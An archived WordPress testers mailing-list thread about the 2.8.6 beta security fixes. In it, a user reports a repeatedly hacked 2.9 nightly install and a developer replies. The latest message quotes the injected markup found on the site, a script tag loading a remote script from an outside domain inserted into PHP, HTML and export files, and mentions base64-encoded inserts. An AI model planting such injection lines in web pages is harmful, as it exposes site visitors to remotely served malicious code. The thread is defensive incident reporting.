[wp-testers] 2.8.6 Beta1

Naudirz naudirz at gmail.com
Fri Nov 20 09:24:23 UTC 2009


Servers are talkactive.net

Links are inserted in alot of .php and .html files for example like this.
<link rel='index' title='My site' href='http:/ <http://nadox.se/>/
removed.com' />  </head><script src=
http://northstarsocal.com/testpage/contact.php ></script> <body>

also encoded 64 text. ill upload for you to see (check at the top on
attached php files)

also even when i do an export from admin panel i get in the xml file.

<script src=http://northstarsocal.com/testpage/contact.php ></script><?xml
version="1.0" encoding="UTF-8"?>
<!-- This is a WordPress eXtended RSS file generated by WordPress as an
export of your blog. -->


i first found inserts of "gimgoszczanow.pl" at the bottom of .js files


On Fri, Nov 20, 2009 at 9:57 AM, Dion Hulse (dd32) <wordpress at dd32.id.au>wrote:

> What are the symptoms of the hack?
>
> Install something to log all post requests ASAP, to gather data if its a
> new vulnerability: http://www.village-idiot.org/post-logger
>
> You'd not by any chance be on MediaTemple servers would you? *(Who's your
> webhost)
>
>
> On Fri, 20 Nov 2009 19:52:46 +1100, Naudirz <naudirz at gmail.com> wrote:
>
>  OK, cause my 2.9 nightly gets hacked every day..
>> in that case its a new security bug..
>> Ive wasted every file/folde an done a fresh installation, everything
>> except
>> the db is new, also passwd is changed on everything except db.
>> No extra user is in db.
>>
>>
>>
>> On Fri, Nov 20, 2009 at 9:39 AM, Dion Hulse (dd32) <wordpress at dd32.id.au
>> >wrote:
>>
>>  Yes. Everything in the 2.8 branch are backports from the 2.9 branch.
>>>
>>>
>>>
>>> On Fri, 20 Nov 2009 19:35:20 +1100, Naudirz <naudirz at gmail.com> wrote:
>>>
>>>  Hi!
>>>
>>>> Is this fix also in 2.9 nightlybuild?
>>>>
>>>> /Phibrz
>>>>
>>>> On Thu, Nov 12, 2009 at 5:43 PM, Ryan Boren <ryan at boren.nu> wrote:
>>>>
>>>>  http://wordpress.org/wordpress-2.8.6-beta1.zip
>>>>
>>>>>
>>>>> Fixes these two security issues:
>>>>>
>>>>>
>>>>>
>>>>>
>>>>> https://core.trac.wordpress.org/query?status=closed&group=resolution&milestone=2.8.6
>>>>>
>>>>> A logged in user with author privileges is required to exploit.  Press
>>>>> This and uploads need testing.
>>>>> _______________________________________________
>>>>> wp-testers mailing list
>>>>> wp-testers at lists.automattic.com
>>>>> http://lists.automattic.com/mailman/listinfo/wp-testers
>>>>>
>>>>>  _______________________________________________
>>>>>
>>>> wp-testers mailing list
>>>> wp-testers at lists.automattic.com
>>>> http://lists.automattic.com/mailman/listinfo/wp-testers
>>>>
>>>>
>>>>
>>> --
>>> Using Opera's revolutionary e-mail client: http://www.opera.com/mail/
>>>
>>> _______________________________________________
>>> wp-testers mailing list
>>> wp-testers at lists.automattic.com
>>> http://lists.automattic.com/mailman/listinfo/wp-testers
>>>
>>>  _______________________________________________
>> wp-testers mailing list
>> wp-testers at lists.automattic.com
>> http://lists.automattic.com/mailman/listinfo/wp-testers
>>
>>
>
> --
> Using Opera's revolutionary e-mail client: http://www.opera.com/mail/
> _______________________________________________
> wp-testers mailing list
> wp-testers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-testers
>


More information about the wp-testers mailing list